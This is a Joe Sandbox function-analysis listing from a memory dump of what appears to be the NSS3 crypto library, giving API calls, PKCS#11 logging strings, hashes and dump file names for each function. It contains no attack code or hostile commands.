Opcode ID: 0dc8a7a914d8b9602aaf3812c418b6a6fdf68183b909b27619b8404710784ca6
Instruction ID: 606e0c0f42ac375c5eb739c0c58ce6f8b8254450d809ef685f47575e44108532
Opcode Fuzzy Hash: 0dc8a7a914d8b9602aaf3812c418b6a6fdf68183b909b27619b8404710784ca6
Instruction Fuzzy Hash: 1041D5F1E512057BEB10CB78AE85B5B77ACAF0424CF040830EA05E6B42F735DA18C7A2

Function 6C786CD0 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C786910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C786943
Part of subcall function 6C786910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C786957
Part of subcall function 6C786910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C786972
Part of subcall function 6C786910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C786983
Part of subcall function 6C786910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7869AA
Part of subcall function 6C786910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7869BE
Part of subcall function 6C786910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7869D2
Part of subcall function 6C786910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7869DF
Part of subcall function 6C786910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C786A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C786D8C
free.MOZGLUE(00000000), ref: 6C786DC5
free.MOZGLUE(?), ref: 6C786DD6
free.MOZGLUE(?), ref: 6C786DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C786E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C786E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C786E72
free.MOZGLUE(?), ref: 6C786EA7
free.MOZGLUE(?), ref: 6C786EC4
free.MOZGLUE(?), ref: 6C786ED5
free.MOZGLUE(00000000), ref: 6C786EE3
free.MOZGLUE(?), ref: 6C786EF4
free.MOZGLUE(?), ref: 6C786F08
free.MOZGLUE(00000000), ref: 6C786F35
free.MOZGLUE(?), ref: 6C786F44
free.MOZGLUE(?), ref: 6C786F5B
free.MOZGLUE(00000000), ref: 6C786F65

Part of subcall function 6C786C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C78781D,00000000,6C77BE2C,?,6C786B1D,?,?,?,?,00000000,00000000,6C78781D), ref: 6C786C40
Part of subcall function 6C786C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?), ref: 6C786C58
Part of subcall function 6C786C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C78781D), ref: 6C786C6F
Part of subcall function 6C786C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C786C84
Part of subcall function 6C786C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C786C96
Part of subcall function 6C786C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C786CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C786F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C786FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C786FF4

Strings

+`yl, xrefs: 6C786D0D
/G6/, xrefs: 6C786CDC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`yl$/G6/
API String ID: 1304971872-821601415
Opcode ID: fb8bdd17474e7763d8094384436bebd3deb2427ef57de789ab06f578f19c6928
Instruction ID: 5060589630e95ecdc513b5d8b1244d597312b9ca4c20a1c1f3d3581967064eca
Opcode Fuzzy Hash: fb8bdd17474e7763d8094384436bebd3deb2427ef57de789ab06f578f19c6928
Instruction Fuzzy Hash: 54B156B0D12209AFDF10CFA9DA45B9EBBB9BF05349F140034EA15E7641E735EA14CBA1

Function 6C774950 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6C774976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7749A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7749B6

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7749CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7749FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C774A09
PR_LogPrint.NSS3(?,00000000), ref: 6C774A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C774A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C774A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6C774A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6C774B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C774B26
PR_LogPrint.NSS3(?,00000000), ref: 6C774B3C

Strings

phNewObject = 0x%p, xrefs: 6C774A77
pTemplate = 0x%p, xrefs: 6C774A39
(CK_INVALID_HANDLE), xrefs: 6C7749AF, 6C774A02, 6C774B1F
C_CopyObject, xrefs: 6C774971
hObject = 0x%x, xrefs: 6C7749E4, 6C7749F4
/G6/, xrefs: 6C77495C
*phNewObject = 0x%x, xrefs: 6C774B01, 6C774B11
ulCount = %d, xrefs: 6C774A57
hSession = 0x%x, xrefs: 6C774991, 6C7749A1

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$/G6/$C_CopyObject
API String ID: 1003633598-4268641443
Opcode ID: f4c2233f0428f64a52c0a048058bd41c49a3fc71885d0b73be9ef2551c93260d
Instruction ID: ddd5393745c674a90d9adeb53e63ad2384c09e09d6fa36343aaec566e0b083f7
Opcode Fuzzy Hash: f4c2233f0428f64a52c0a048058bd41c49a3fc71885d0b73be9ef2551c93260d
Instruction Fuzzy Hash: 2951BF71601108ABDF30CB59AF4CEAE3B65AB4220CF454874F80967B12D724AD18EFE6

Function 6C784C20 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C784C4C
EnterCriticalSection.KERNEL32(?), ref: 6C784C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C784CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C784CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C784CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C784D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C784D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C784DB7

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

TlsGetValue.KERNEL32 ref: 6C784DD7
EnterCriticalSection.KERNEL32(?), ref: 6C784DEC
PR_Unlock.NSS3(?), ref: 6C784E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C784E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C784E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C784E71
free.MOZGLUE(00000000), ref: 6C784E7A
PR_Unlock.NSS3(?), ref: 6C784EA2
TlsGetValue.KERNEL32 ref: 6C784EC1
EnterCriticalSection.KERNEL32(?), ref: 6C784ED6
PR_Unlock.NSS3(?), ref: 6C784F01
free.MOZGLUE(00000000), ref: 6C784F2A

Strings

/G6/, xrefs: 6C784C2C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID: /G6/
API String ID: 759471828-570549270
Opcode ID: 781a430f244876bf05e75dd037a1f2429811a24af1416f4360c490a759c3ac2c
Instruction ID: 7c11b3c3b8c5f3c755d0f5f004012ab80e85e557ba1c1f9a18542646924d6b8b
Opcode Fuzzy Hash: 781a430f244876bf05e75dd037a1f2429811a24af1416f4360c490a759c3ac2c
Instruction Fuzzy Hash: 74B12171A012059FDF10EF68DA48AAA77B8BF4931CF044139EE0597B01EB74E964CBE1

Function 6C7708F0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C77094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C770953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C77096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C770974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C77098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C770995

Part of subcall function 6C771800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C771860
Part of subcall function 6C771800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C7709BF), ref: 6C771897
Part of subcall function 6C771800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7718AA
Part of subcall function 6C771800: memcpy.VCRUNTIME140(?,?,?), ref: 6C7718C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C770B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C770B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C770B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C770B78

Strings

key, xrefs: 6C770ACB
psk_id_hash, xrefs: 6C7709B5
info_hash, xrefs: 6C7709E0
/G6/, xrefs: 6C770902
secret, xrefs: 6C770A88
base_nonce, xrefs: 6C770B06
exp, xrefs: 6C770B36

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: /G6/$base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-229161437
Opcode ID: b0ae7e31f7a7f0cd401577bbb7e4bb448467dbfd328cbaa32a75fc3cd7dd75ec
Instruction ID: 651b1b3945146d579f478e7b97795aae2840acc672c442a2ad9b71182ef4d136
Opcode Fuzzy Hash: b0ae7e31f7a7f0cd401577bbb7e4bb448467dbfd328cbaa32a75fc3cd7dd75ec
Instruction Fuzzy Hash: B5818B75604305AFC720CF55CD8499AF7E8FF8C208F048929F99897751E731EA19CBA2

Function 6C7789B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 149COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKey), ref: 6C7789D6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C778A04
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C778A13

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C778A29
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C778A4B
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C778A67
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C778A83
PR_LogPrint.NSS3( phKey = 0x%p,?), ref: 6C778AA1
PL_strncpyz.NSS3(?, *phKey = 0x%x,00000050), ref: 6C778B43
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C778B52
PR_LogPrint.NSS3(?,00000000), ref: 6C778B68

Strings

C_GenerateKey, xrefs: 6C7789D1
pTemplate = 0x%p, xrefs: 6C778A62
(CK_INVALID_HANDLE), xrefs: 6C778A0C, 6C778B4B
/G6/, xrefs: 6C7789BC
*phKey = 0x%x, xrefs: 6C778B2D, 6C778B3D
ulCount = %d, xrefs: 6C778A7E
pMechanism = 0x%p, xrefs: 6C778A46
hSession = 0x%x, xrefs: 6C7789EE, 6C7789FE
phKey = 0x%p, xrefs: 6C778A9C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pTemplate = 0x%p$ phKey = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$/G6/$C_GenerateKey
API String ID: 1003633598-548639292
Opcode ID: 8ad99102cdd26a11ef68b871acd3b282ead38c4d0343d3875d8fdd75e7c4370f
Instruction ID: b802c57e1dad266adbc015eabe6ce78c0c18c72e10df8ebef9f135916e313497
Opcode Fuzzy Hash: 8ad99102cdd26a11ef68b871acd3b282ead38c4d0343d3875d8fdd75e7c4370f
Instruction Fuzzy Hash: 33516F71601108ABDF30DF59EE88EAE3765AB4220CF444435E8096BB12D734A859DBE2

Function 6C77AB10 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageNext), ref: 6C77AB36
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C77AB64
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C77AB73

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C77AB89
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C77ABAB
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C77ABC6
PR_LogPrint.NSS3( pCiphertextPart = 0x%p,?), ref: 6C77ABE1
PR_LogPrint.NSS3( ulCiphertextPartLen = %d,?), ref: 6C77ABFC
PR_LogPrint.NSS3( pPlaintextPart = 0x%p,?), ref: 6C77AC17
PR_LogPrint.NSS3( pulPlaintextPartLen = 0x%p,?), ref: 6C77AC30

Strings

ulCiphertextPartLen = %d, xrefs: 6C77ABF7
C_DecryptMessageNext, xrefs: 6C77AB31
(CK_INVALID_HANDLE), xrefs: 6C77AB6C
ulParameterLen = 0x%p, xrefs: 6C77ABC1
pPlaintextPart = 0x%p, xrefs: 6C77AC12
pCiphertextPart = 0x%p, xrefs: 6C77ABDC
/G6/, xrefs: 6C77AB1C
pParameter = 0x%p, xrefs: 6C77ABA6
hSession = 0x%x, xrefs: 6C77AB4E, 6C77AB5E
pulPlaintextPartLen = 0x%p, xrefs: 6C77AC2B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pCiphertextPart = 0x%p$ pParameter = 0x%p$ pPlaintextPart = 0x%p$ pulPlaintextPartLen = 0x%p$ ulCiphertextPartLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$/G6/$C_DecryptMessageNext
API String ID: 1003633598-35583161
Opcode ID: 652b68c601af17d82c2b33eb5b8efa501efba62fadc57b09a03b172ed6046728
Instruction ID: f708be5757d78c9fc60db73c97321943aecbc7d94e5cca2915b08a653de60b46
Opcode Fuzzy Hash: 652b68c601af17d82c2b33eb5b8efa501efba62fadc57b09a03b172ed6046728
Instruction Fuzzy Hash: 44419332601108AFEF308F95EF4CE9E3B72AB4221DF445474F90867A22D735E854DBA2

Function 6C77AF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C77AF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C77AF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C77AF83

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C77AF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C77AFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C77AFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C77AFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C77B00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C77B028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C77B041

Strings

ulDataLen = %d, xrefs: 6C77B00A
(CK_INVALID_HANDLE), xrefs: 6C77AF7C
ulParameterLen = 0x%p, xrefs: 6C77AFD4
C_SignMessage, xrefs: 6C77AF41
pulSignatureLen = 0x%p, xrefs: 6C77B03C
pSignature = 0x%p, xrefs: 6C77B023
/G6/, xrefs: 6C77AF2C
pParameter = 0x%p, xrefs: 6C77AFB9
pData = 0x%p, xrefs: 6C77AFEF
hSession = 0x%x, xrefs: 6C77AF5E, 6C77AF6E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$/G6/$C_SignMessage
API String ID: 1003633598-1912484872
Opcode ID: 64bdcd28780d2994dc81f6cc9f8eeaa3a0799d2e034ed16d50e847c03509db93
Instruction ID: b0d585b3fb307cd740ee2d63ef0320bbc891b6b02fe1cbea867264b4a7aa76d8
Opcode Fuzzy Hash: 64bdcd28780d2994dc81f6cc9f8eeaa3a0799d2e034ed16d50e847c03509db93
Instruction Fuzzy Hash: 5F418076601148AFDF308F95EE4CE9E3BB1AB4231DF484474F90867A12D734A858DBA1

Function 6C744AF0 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 355memorystringthreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,?,6C781444,?,?,00000000,?,?), ref: 6C744BD4

Part of subcall function 6C780C90: PR_SetError.NSS3(00000000,00000000,6C781444,?,00000001,?,00000000,00000000,?,?,6C781444,?,?,00000000,?,?), ref: 6C780CB3

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C781444), ref: 6C744B87
memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C744BA5

Part of subcall function 6C7988E0: TlsGetValue.KERNEL32(00000000,?,?,6C7A08AA,?), ref: 6C7988F6
Part of subcall function 6C7988E0: EnterCriticalSection.KERNEL32(?,?,?,?,6C7A08AA,?), ref: 6C79890B
Part of subcall function 6C7988E0: PR_NotifyCondVar.NSS3(?,?,?,?,?,6C7A08AA,?), ref: 6C798936
Part of subcall function 6C7988E0: PR_Unlock.NSS3(?,?,?,?,?,6C7A08AA,?), ref: 6C798940

PR_SetError.NSS3(FFFFE02A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C744DF5
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6C744B94

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C781444,?), ref: 6C744BC2
PR_GetCurrentThread.NSS3(?,?,?,?,?,00000000,00000000), ref: 6C744BEF
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C781444), ref: 6C744C27
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C781444), ref: 6C744C42
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C744D5A
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C744D67
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C744D78
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C744DE4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C744E4C
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C744E5B
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C744E6C

Part of subcall function 6C744880: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7448A2

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C744EF1
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C744F02

Strings

/G6/, xrefs: 6C744AFC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
